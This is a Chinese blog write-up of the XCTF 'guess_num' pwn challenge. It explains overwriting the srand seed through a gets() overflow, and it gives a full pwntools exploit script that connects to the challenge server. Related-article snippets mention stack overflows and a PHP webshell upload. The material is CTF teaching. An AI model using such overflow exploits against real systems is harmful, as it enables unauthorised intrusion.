guess_num(xctf)

最新推荐文章于 2022-04-09 17:28:44 发布
最新推荐文章于 2022-04-09 17:28:44 发布
阅读量460 收藏
点赞数
分类专栏: # xctf(pwn新手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/105962110
版权

0x0 程序保护和流程

保护:

流程:

main()

sub_C3E()

如果程序能成功运行到最后就能获得flag

0x1 利用过程

由于程序保护的比较全面,因此不能通过gets()进行栈溢出,所以只能通过模仿程序流程来解决问题。查阅资料得知srand(seed)会根据seed的数值改变rand()函数产生的随机数,也就是说相同种子生成的随机数是相同的。刚好gets()函数可以修改seed[0]的数值。

0x2 exp

from pwn import *
from ctypes import *				#调用srand()
#sh=process('./a')
sh=remote('124.126.19.106','39698')
libc=cdll.LoadLibrary('libc.so.6')	#加载函数
libc.srand(0)						#设置seed[0]的值
sh.recv()
payload='a'*0x20+p64(0)				#修改seed[0]的值
sh.sendline(payload)
for i in range(10):
    sh.recv()
    sh.sendline(str(libc.rand()%6+1))

sh.interactive()
whiteh4nd
关注
专栏目录
CTF|栈溢出guess num 练习及知识点总结
skyattractive的博客
05-31 1172
CTF|栈溢出题目guess_num 练习及知识点总结 博客主要记录博主做的一栈溢出题目和所涉及到的知识点的总结 . 题目 将得到的文件拖入64位IDA中F5反编译得到伪代码 观察伪代码 得到如下信息: 定义char型 v9 让你输入内容,用gets()函数获取你输入的值,但是没有做限制 将v6 = v8就success! 实现success!之后可以进入sub-C3E函数,即可得到flag! 其中代码涉及到两个特殊的函数 关于两个函数的知识点如下: rand()函数用来产生随机数,但是,ran.
echo_back(xctf)
weixin_43868725的博客
08-16 747
0x0 程序保护和流程 保护: 流程: main() echo_back() 存在一个格式化字符串漏洞。 0x1 利用过程 1.题目保护全开,程序中又没有可用的字符串,函数。所以只能通过格式化字符串漏洞泄露地址,写入有限数据。 2.既然有格式化字符串漏洞,肯定是要泄露栈上的信息。但是由于限制了字符串最长为7,所以只能逐位泄露。 选择使用ida的远程调试,因为可以丢弃alarm()发出的signal。选择在echo_back()的retn处下断点 直到到输入%6$p时在栈上发现了被输出的数据(为什么是
xctf--新手区--guess_num
gclome的博客
04-20 788
writeup 老规矩,先checksec下,查看保护机制 64位程序,保护机制全开啊,不过不慌,先运行一下大致看看 两次输入分别是Your name和 guess number ,其余皆是程序输出,貌似没有得到什么有用的东西。 再次借助强大的IDA查看源码: 分析源码得知,我们要输入十次随机数产生的值,如果一次错,那就GG,十次全部输入正确,就success!,flag应该就藏在succes...
xctf-pwn 之guess_num
neuisf的博客
12-30 322
未解出!经过最近几道题,发现自己思路不够开阔,不能做到应变。 此题考查内容:伪随机数可预测。 解题方法:通过IDA反编译后,F5获得伪代码,通过阅读伪代码,理清程序结构,找到破解关键:使用随机数生成数字。如果已知随机数种子,就可以提前知道随机数的值。可以通过溢出覆盖种子值。 ...
XCTF Guess
stepone4ward的博客
07-16 398
phar文件上传 随机数预测
XCTF Guess-the-Number
YenKoc的博客
03-22 441
一.发现是jar文件,一定想到反汇编gdui这个工具,而且运行不起来,可能是我电脑问题,我就直接反编译出来了。 也发现了flag,和对应的算法,直接拉出来,在本地运行,后得到flag 二.java代码 ...
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
时间:_2019年8月3日_0900——2019年8月5日_0900__比赛详情_Contes_xctf20190803.zip
最新发布
09-04
时间:_2019年8月3日_0900——2019年8月5日_0900__比赛详情_Contes_xctf20190803
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 657
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
xctf guess_num
pondzhang的专栏
12-09 144
from pwn import * #p = process('./guess_num') p = remote("220.249.52.133",41750) p.recvuntil('Your name:') payload = 'a'*32 + p64(1) #gdb.attach(p,'b* rebase(0x0000000000000D2B)') p.sendline(payload) p.recvuntil('number:') p.sendline('2') p.recvuntil('nu.
XCTF-pwn-guess_num - Writeup
菜小狗.的博客
08-11 6746
学习就是一个积累的过程 在这个过程中就是为了让迷迷糊糊的东西变得明朗起来的一个过程^_ ^ 所以往往在这个过程中会付出很多的时间来一点点积累~ 按照惯例看一下题目基本情况和它的保护情况等 开启了canary,不能直接栈溢出咯~ 下一步按照惯例该丢到ida里分析了。 可以看到sub_C3E()函数是可以调用system的 再main函数的后半段发现只要将输入的值十次v4都等于v6即可进入 su...
攻防世界guess_num
zyh18851473527的博客
08-05 3052
首先下载附件 checksec一下再放入IDA中 点击进入sub_C3E函数,发现条件成立即可找到flag 接着进入v7 发现var_30在栈中占0x20,可以覆盖到seed 即利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 ...
xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number
l8947943的博客
04-09 9941
0x01. 进入环境,下载附件 题目给出的一个jar文件,我们双击打开,并将文件解压,找到其中的.class文件。我们将其反编译,此处有多种工具,我使用的vscode的Decompiler插件。如图 0x02. 问题分析 我们使用反编译得到的代码如下: import java.math.BigInteger; public class guess { public static String XOR(String _str_one, String _str_two) { BigInteger
攻防世界 xctf -Guess writeup
小傅
07-17 1381
本题的解析官网上有,这里是一个自动化的脚本,完成的是自动上传一个ant.jpg的文件(ant.jpg是一个ant.zip压缩包重命名的文件,里面是一个ant.php的一句话木马)。运行返回的是在web后台这个文件重命名后的文件的url。可通过zip伪协议访问这个木马。 这个脚本运行需要3个在linux下运行的脚本文件(因为php伪随机数的破解用了一些工具,还有一些php代码)。脚本文件有:猜解随...
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1242
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
guess_num
4HftysN
08-02 776
主函数代码 这道题的思路是通过v8的输入 覆盖seed的值 进入v8可以看到与seed相差0x20 此处就可构造payload=‘a’*0x20+p64(1) -------------------------------------------------设置种子数为1 通过控制种子数seed来控制随机数rand 以取得flag 在调用rand()函数时,必须先利用srand...
2019.7.14 guessnum and level2
DSR446的博客
07-14 762
这里写自定义目录标题欢迎使用新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用 你好! 这是你第一次使用...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4318
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值